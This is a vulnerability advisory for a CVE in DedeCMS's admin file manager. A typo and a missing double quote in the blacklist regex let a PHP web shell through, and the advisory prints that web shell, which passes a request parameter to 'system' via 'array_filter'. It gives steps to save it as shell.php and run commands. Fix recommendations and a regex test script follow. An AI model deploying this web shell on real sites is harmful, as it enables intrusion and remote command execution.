# CVE-2026-30694 dedecms admin portal file manage getshell via bypass blacklist

## Download source code

<https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.118-UTF8.zip>

***

## admin portal RCE - Bypassing the blacklist regular expression flaw (verified)

* Location: `/dede/tpl.php` (file manage function)
* Risk Level: High (Requires DedeCMS administrator privileges; full RCE can be achieved)
* Exploitability: Confirmed to be exploitable
* Prerequisites: Requires administrator privileges
* Affected Scope: <= V5.7.118 UTF-8 versions

## Vulnerability Discovery

Regular expression analysis revealed two key flaws in the DedeCMS blacklist detection regular expressions:

Defect 1: Spelling error

```php
// Source code /dede/tpl.php line 35
'array_filert'  // misspelled blacklist entry; it should be 'array_filter'
```

Defect 2: Incomplete character class at the end of the regular expression

```php
// Regular expression (source code /dede/tpl.php line 38):
preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", $content)
//                                           ^^^^^^
//                                           Characters: ( [ { '
//                                           The double quote " is missing!
```

### Detailed Explanation of the Bypass Principle

The regular expression ending with `[([{']` only matches: `( [ { '`. It does not match: `" (double quotes)`.

Therefore, when the callback name is enclosed in double quotes, the regular expression cannot detect it.

**Example:**

Content written to a PHP file: `array_filter(["id"],"system")` → because the callback `"system"` is wrapped in double quotes and the final character class does not contain `"`, the regular expression does not match, so the check is bypassed.

**Python POC for regular expression**

```python
import re

# Python equivalent of the blacklist check for the entry "system"
# (the trailing class [([{'] contains no double quote)
pattern = r'[^a-z]+[\'\"]*system[\'\"]*\s*[([{\']'

# test
print(re.search(pattern, '}"system"', re.I))   # None (bypassed!)
```

**Full payload**

```php
<?php
// Bypassing the blacklist using array_filter + a double-quoted callback
$g = "_GET";
$c = "c";
array_filter([${$g}[$c]],"system");
```

## Step

{% stepper %}
{% step %}
Log in to the admin portal
{% endstep %}

{% step %}
Go to Core Module → Attachment Management → File Manager
{% endstep %}

{% step %}
Create a new file (e.g., shell.php), insert the following content, and save it:

{% code title="shell.php" %}

```php
<?php
$g = "_GET";
$c = "c";
array_filter([${$g}[$c]],"system");
```

{% endcode %}
{% endstep %}

{% step %}
Save the file (the blacklist check is bypassed)
{% endstep %}

{% step %}
Access the PHP file and pass a parameter such as `?c=whoami`; a shell is obtained.
{% endstep %}
{% endstepper %}

## Relevant Screenshots

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2F5w9vjvHUudMpX1pF6kOS%2Fimage-20260130180021054.png?alt=media&#x26;token=89441114-2a45-47a1-891e-ab1fcbee89fe" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2FoilYptRQJCY2N4VnGWU8%2Fimage-20260130180114819.png?alt=media&#x26;token=f2b3059d-8d11-4e83-87cc-497fa5d32479" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2FcgxtZR3OlQKfK9aA6WAC%2Fimage-20260130180218293.png?alt=media&#x26;token=3e054a7d-fc67-4bdc-984a-3fffb10e7a0c" alt=""><figcaption></figcaption></figure>

### Source code fix recommendation

It is recommended to fix the following two issues in the source code:

1. In `dede/tpl.php`, on line 38, fix the regular expression by adding `"` to the end of the character class:

```php
preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{'\"]#i", $content)
```

2. In `dede/tpl.php`, on line 35, fix the spelling error in the blacklist entry:

```php
// Original: 'array_filert'
// Should be:
'array_filter'
```
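To check that both fixes close the gap described above, the following added example (not part of the original advisory or of DedeCMS) re-implements the `preg_match` check in Python and runs the original and the corrected regex/blacklist pairs over constructed file contents, including the double-quoted form from this page. The blacklist entries are an assumed three-entry subset, not the full list from `dede/tpl.php`.

```python
import re

# Constructed subset of blacklist entries; the first list carries the
# 'array_filert' typo from dede/tpl.php line 35, the second list corrects it.
BLACKLIST_ORIGINAL = ["array_filert", "system", "exec"]
BLACKLIST_FIXED = ["array_filter", "system", "exec"]

# Trailing character class of the regex on dede/tpl.php line 38:
# the original omits the double quote, the fixed version adds it.
TAIL_ORIGINAL = r"[([{']"
TAIL_FIXED = r"[([{'\"]"


def build_pattern(value: str, tail: str) -> re.Pattern:
    """Python equivalent of #[^a-z]+['\"]*{$value}['\"]*[\s]*<tail>#i."""
    return re.compile(r"[^a-z]+['\"]*" + re.escape(value) + r"['\"]*\s*" + tail, re.I)


def flagged_entries(content: str, blacklist: list[str], tail: str) -> list[str]:
    """Return the blacklist entries whose pattern matches the file content."""
    return [v for v in blacklist if build_pattern(v, tail).search(content)]


# Constructed file contents: a direct call, the single-quoted callback the
# original regex still catches, and the double-quoted form from this page.
SAMPLES = {
    "direct_call": "<?php system($_GET['c']);",
    "single_quoted_callback": "<?php array_filter([$_GET['c']],'system');",
    "double_quoted_callback": '<?php array_filter([$_GET["c"]],"system");',
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        before = flagged_entries(content, BLACKLIST_ORIGINAL, TAIL_ORIGINAL)
        after = flagged_entries(content, BLACKLIST_FIXED, TAIL_FIXED)
        print(f"{name}: original={before} fixed={after}")
```

With the original pair, the double-quoted sample is flagged by nothing; with the fixed pair it is flagged by both the `array_filter` and the `system` entries.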

